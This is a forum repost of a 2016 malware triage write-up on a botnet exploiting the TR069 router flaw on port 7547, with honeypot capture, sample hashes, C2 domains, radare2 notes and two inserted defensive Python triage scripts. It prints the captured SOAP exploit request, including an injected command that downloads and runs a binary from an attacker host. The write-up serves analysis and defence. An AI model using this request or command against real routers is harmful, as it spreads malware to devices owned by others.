[Other] Quick TR069 Botnet Writeup + Triage
复制你的爱 posted on 2016-11-30 20:25:21

TL;DR- A wormable exploit for the recently published TR069 vulnerability is being actively exploited. I pulled down some samples and hacked together a goofy way to perform dynamic analysis with Docker, Qemu, and Tcpdump. The C2 domains are tr069[.]support and tr069[.]online .
  There are several different botnets propagating this worm. I'm only going to document one of them in this post. Also I haven't written a blog post in like a year so here goes nothing.
  Background

  A few articles have crossed my news feeds about the recent TR069 vulnerability. Including the following-
  • http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/   
  • https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/   
  • https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759  
  I figured I'd whip up a web server on a machine I had laying around (something like a raspberry pi) and forward TCP port 7547 through my router, as well as a sniffer for any funky stuff.
  Analysis

Within about five minutes I was getting hits. The malicious requests have already been documented by some of the aforementioned posts, but the requests look something like this:
  [code]POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519

[...] SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> [...]
`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`
[...]
[/code]  Notice the not-so-subtle command injection in this line-
  [code]`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`[/code]   So I routed curl through Tor and downloaded the sample. Also, having reversed a decent amount of shitty IOT worms in my day I went on a hunch and requested hxxp://srrys[.]pw/2 through hxxp://srrys[.]pw/10 as well and got more hits.
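As an added example (not part of the original post), here is a small triage check of the kind the honeypot above could run over each captured request: it pulls the SOAPAction header and flags any SOAP argument whose text carries shell metacharacters such as the backticks used in the request above. The sample request is constructed; the SetNTPServers/NewNTPServer element names are my assumption about the TR-064 Time service and the download host is a placeholder.

```python
"""Flag TR-064 SOAP requests whose argument text contains shell metacharacters."""
import re
import xml.etree.ElementTree as ET

# Constructed sample, modelled on the captured request above. The element names
# are an assumption about the TR-064 Time service; the host is a placeholder.
SAMPLE_REQUEST = (
    "POST /UD/act?1 HTTP/1.1\r\n"
    "Host: 127.0.0.1:7547\r\n"
    "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n"
    "Content-Type: text/xml\r\n"
    "\r\n"
    '<?xml version="1.0"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    "<NewNTPServer1>`cd /tmp;wget http://c2.invalid/1;chmod 777 1;./1`</NewNTPServer1>"
    "<NewNTPServer2></NewNTPServer2></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)

# Characters that have no business in an NTP server name but drive a shell.
SHELL_META = re.compile(r"[`;|&$]")


def split_request(raw):
    """Split a raw HTTP request into (request line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def find_injected_args(body):
    """Return (tag, text) for every leaf element whose text contains shell metacharacters."""
    root = ET.fromstring(body)
    return [(el.tag, el.text) for el in root.iter()
            if len(el) == 0 and el.text and SHELL_META.search(el.text)]


def triage(raw):
    """Summarise one captured request: action invoked and any suspicious argument values."""
    request_line, headers, body = split_request(raw)
    is_xml = headers.get("content-type", "").startswith("text/xml")
    return {
        "request_line": request_line,
        "soapaction": headers.get("soapaction", ""),
        "injected": find_injected_args(body) if is_xml else [],
    }
```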
  [code]$ file *
1:            ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped  
2:            ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped  
3:            ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped  
4:            ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped  
5:            ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped  
6:            ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped  
7:            ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped[/code]  ...with the following SHA256 hashes...
  [code]971156ec3dca4fa5c53723863966ed165d546a184f3c8ded008b029fd59d6a5a  1  
9f9c38740568cbe1fbb8171b1ad4221c43790ff106623555868abf76f9672e53  2  
1fce697993690d41f75e0e6ed522df49d73a038f7e02733ec239c835579c40bf  3  
828984d1112f52f7f24bbc2b15d0f4cf2646cd03809e648f0d3121a1bdb83464  4  
c597d3b8f61a5b49049006aff5abfe30af06d8979aaaf65454ad2691ef03943b  5  
046659391b36a022a48e37bd80ce2c3bd120e3fe786c204128ba32aa8d03a182  6  
5d4e46b3510679dc49ce295b7f448cd69e952d80ba1450f6800be074992b07cc  7[/code]   If you've ever tracked IOT threats before this will be a familiar sight. Lots of malware cross-compiles for lots of different architectures, like in this example.
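To show what the `file` listing above is reading out of each sample, here is an added example (not from the original post) that parses the ELF identification bytes and e_machine field the same way and pairs them with the SHA256 hash. The sample headers are constructed in the script, not the real binaries.

```python
"""Minimal ELF header triage: word size, byte order, machine, plus SHA256 of the bytes."""
import hashlib
import struct

# e_machine values from the ELF specification for the architectures in the listing above.
E_MACHINE = {2: "SPARC", 3: "Intel 80386", 4: "Motorola m68k", 8: "MIPS",
             20: "PowerPC", 40: "ARM", 42: "Renesas SH", 62: "x86-64"}


def elf_triage(data):
    """Return a dict describing the ELF header, or None if data is not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    endian = {1: "<", 2: ">"}.get(ei_data)  # EI_DATA: 1 = little, 2 = big
    if endian is None or ei_class not in (1, 2):
        return None
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "byte_order": "LSB" if ei_data == 1 else "MSB",
        "type": {2: "EXEC", 3: "DYN"}.get(e_type, f"0x{e_type:x}"),
        "machine": E_MACHINE.get(e_machine, f"unknown(0x{e_machine:x})"),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def make_fake_header(ei_class, ei_data, e_machine):
    """Constructed 52-byte ELF32 header for testing; not one of the real samples."""
    endian = "<" if ei_data == 1 else ">"
    ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    rest = struct.pack(endian + "HHIIIIIHHHHHH",
                       2, e_machine, 1, 0x400260, 52, 0, 0, 52, 32, 1, 40, 0, 0)
    return ident + rest


# Constructed stand-ins mirroring the architectures of samples 1, 2, 3 and 7.
SAMPLES = {
    "1": make_fake_header(1, 1, 8),   # MIPS, little-endian
    "2": make_fake_header(1, 2, 8),   # MIPS, big-endian
    "3": make_fake_header(1, 1, 40),  # ARM
    "7": make_fake_header(1, 2, 4),   # Motorola m68k
}


def triage_all(samples):
    return {name: elf_triage(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, info in triage_all(SAMPLES).items():
        print(name, info["bits"], info["byte_order"], info["machine"], info["sha256"][:16])
```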
Let's do some basic static analysis. This is usually where I'd bust out my IDA Pro but some fucker stole my laptop recently and I haven't gotten my new license yet. So instead we're going to use Radare2, something equally cool but less familiar to me. Shouts out to the R2 team. Keep doing God's work.
  [code]$ r2 1
Warning: Cannot initialize dynamic strings  
-- Change the graph block definition with graph.callblocks, graph.jmpblocks, graph.flagblocks
[0x00400260]> aa
[x] Analyze all flags starting with sym. and entry0 (aa)[/code]   I run the aa command to analyze the code/functions, followed by pdf @main to disassemble main in the regular mode and V @main + space bar to disassemble in visual mode.
ah yes

[screenshot: Quick TR069 Botnet Writeup + Triage-1]

  of course

[screenshot: Quick TR069 Botnet Writeup + Triage-2]

  indeed
郭为 posted on 2016-12-17 17:10:30
复制你的爱's level is really high!